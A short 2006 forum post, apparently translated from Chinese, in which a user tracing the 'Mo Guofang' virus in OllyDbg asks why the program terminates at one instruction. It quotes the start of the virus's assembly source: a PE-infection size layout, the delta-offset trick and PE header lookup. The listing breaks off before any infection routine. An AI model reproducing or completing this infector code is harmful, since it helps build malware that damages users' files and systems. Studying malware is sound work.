A question about the "Mo Guofang" (莫国防) virus code
Posted on: 2006-6-16 11:49
I am tracing the "Mo Guofang" virus code with OllyDbg, but I can't trace any further.
.586p
.model flat,stdcall
option casemap:none ; force case-sensitive identifiers in the program code
include ..\INCLUDE\WINDOWS.INC ;
include ..\INCLUDE\kernel32.inc ;
include ..\INCLUDE\user32.inc ;
include ..\INCLUDE\advapi32.inc ;
include ..\INCLUDE\mpr.inc ;
includelib ..\LIB\kernel32.lib ;
includelib ..\LIB\user32.lib ;
includelib ..\LIB\advapi32.lib ;
includelib ..\LIB\mpr.lib ;
VirusSize = offset VirusEnd - offset VirusStart ;
VirusSizeP1 = offset _OtherMemPosition - offset VirusStart ; the part of this virus that infects PE files in memory
VirusSizeP2 = VirusSize - VirusSizeP1 ; the latter half of this virus, inactive
.code
VirusStart:
nop
pushfd
pushad
db 0e8h, 0, 0, 0, 0
pop ebx
mov edx, ebx
mov eax, ebx
sub ebx, $-5
sub edx, 8
call _GetModuleAddress
add eax, [eax+3ch]
mov lpOldPE[ebx], eax ; ...actual address)
......
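When I trace to the mov lpOldPE[ebx], eax instruction, the debugger shows that the program has terminated. Could an expert please tell me why this happens?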